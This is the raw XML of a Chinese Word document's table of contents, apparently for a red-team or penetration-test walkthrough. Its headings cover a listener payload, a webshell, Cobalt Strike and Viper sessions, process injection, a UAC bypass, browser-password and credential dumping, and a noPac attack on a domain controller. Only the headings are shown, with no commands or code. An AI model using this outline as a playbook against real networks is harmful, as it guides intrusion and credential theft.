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tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsiaTheme="minorEastAsia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目  录</w:t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TOC \o "1-9" \h \u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_Toc28327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一、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>监听载荷(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.xx.xx.50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">:8090 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hxxxxdxxxxmxxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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_Toc28327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_Toc6379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二、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>计划任务操作</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc6379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_Toc8225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2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看计划任务列表：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc8225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_Toc30889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2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看计划任务</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc30889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_Toc25607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2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>终止计划任务</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc25607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_Toc17598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2.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>运行计划任务</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc17598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_Toc29970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2.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>帮助</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc29970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_Toc31704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2.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>示例：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc31704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_Toc12977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2.6.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>每分钟执行一次</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc12977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_Toc13657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2.6.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>每小时执行一次</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc13657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_Toc23998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2.6.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>修改"Daily Check"为每一分钟执行一次</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc23998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_Toc8612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2.6.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>修改计划任务为：指定日期指定时间运行</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc8612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_Toc29728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2.7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参考：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc29728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_Toc25047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2.8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Webshell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上查看计划任务</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc25047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_Toc27166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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">三、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>cs上线信息：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc27166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_Toc6705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四、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Viper上线信息</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc6705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_Toc14259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五、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>创建自守护session</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc14259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_Toc31918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六、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进程注入：可以x86注入到x64位进程</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc31918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_Toc8488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七、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>提权：Windows UAC绕过</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc8488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_Toc13741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八、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Viper创建计划任务</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc13741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_Toc7601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8.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>计划任务详情：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc7601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_Toc12953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九、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>搜索dir命令：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc12953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_Toc5107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十、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>删除del命令：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc5107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_Toc15075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十一、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>迁移到cs:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc15075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_Toc9100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十二、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>cs获取浏览器密码</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc9100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_Toc21974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十三、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>cs查看保存凭证</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc21974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_Toc11291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十四、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>加载CS插件:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc11291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_Toc3085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14.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>插件下载</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc3085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_Toc1378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14.1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>加载cs插件</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1378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_Toc14695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十五、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows杀进程taskkill命令</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc14695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_Toc3562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十六、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看进程启动命令行wmic命令</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc3562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_Toc22729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十七、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用msf正向连接：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc22729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_Toc16802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17.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>生成监听载荷</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc16802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_Toc681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17.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开始连接</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc681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_Toc1297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17.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>端口扫描</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1297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_Toc17612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十八、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Viper凭证获取：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc17612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_Toc10867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18.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开启WDigest开关</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc10867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_Toc24038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18.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc24038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_Toc23941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18.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取windows内存密码</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc23941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_Toc31537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18.2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果：本机</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc31537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_Toc19780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18.2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.xx.xx.50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hxxxxdxxxxmxxx</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc19780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_Toc5047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18.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取浏览器密码</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc5047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_Toc4233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十九、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>反弹shell木马virustotal分析:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc4233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_Toc22270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19.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>正确获得网络连接地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.*.*.167</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:6464</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc22270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_Toc1170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二十、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取域控信息：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1170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_Toc4591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20.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc4591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_Toc7350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20.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc7350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_Toc5332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20.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Ping主机名获得域名ip</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc5332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_Toc12670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二十一、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>尝试nopac漏洞攻击域控</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc12670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_Toc17482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21.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>安装pip</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc17482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_Toc21752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21.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>安装依赖</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc21752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_Toc32105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21.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开始攻击：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc32105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_Toc5014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21.3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Nopac工具链接：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc5014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_Toc1475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21.3.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
